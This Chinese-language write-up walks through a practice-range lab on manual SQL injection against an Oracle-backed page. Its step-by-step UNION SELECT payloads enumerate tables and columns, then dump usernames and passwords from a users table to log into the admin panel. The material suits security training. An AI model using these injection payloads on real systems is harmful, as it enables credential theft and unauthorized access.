墨者學院-SQL手工注入漏洞測試(Oracle資料庫)
阿新 • • 發佈:2021-11-24
墨者學院-SQL手工注入漏洞測試(Oracle資料庫)
前言
靶場地址:https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe
正文
進入靶場環境
http://219.153.49.228:43137/new_list.php?id=1 order by 2 -- +
測試發現,共有兩個欄目
http://219.153.49.228:43137/new_list.php?id=-1 union select '1','2' from dual -- +
判斷回顯
我們需要的是使用者的賬號密碼,因此直接查詢存在users字樣的表名
http://219.153.49.228:43137/new_list.php?id=-1 union select (select table_name from all_tables where rownum=1 and table_name like '%user%'),'null' from dual
得出表名為sns_users
檢視列名
http://219.153.49.228:43137/new_list.php?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users'),'null' from dual
http://219.153.49.228:43137/new_list.php?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'null' from dual
獲取資料
http://219.153.49.228:43137/new_list.php?id=-1 union select user_name,user_pwd from "sns_users"
http://219.153.49.228:43137/new_list.php?id=-1 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'
用第二組密碼成功登陸了後臺
獲得KEY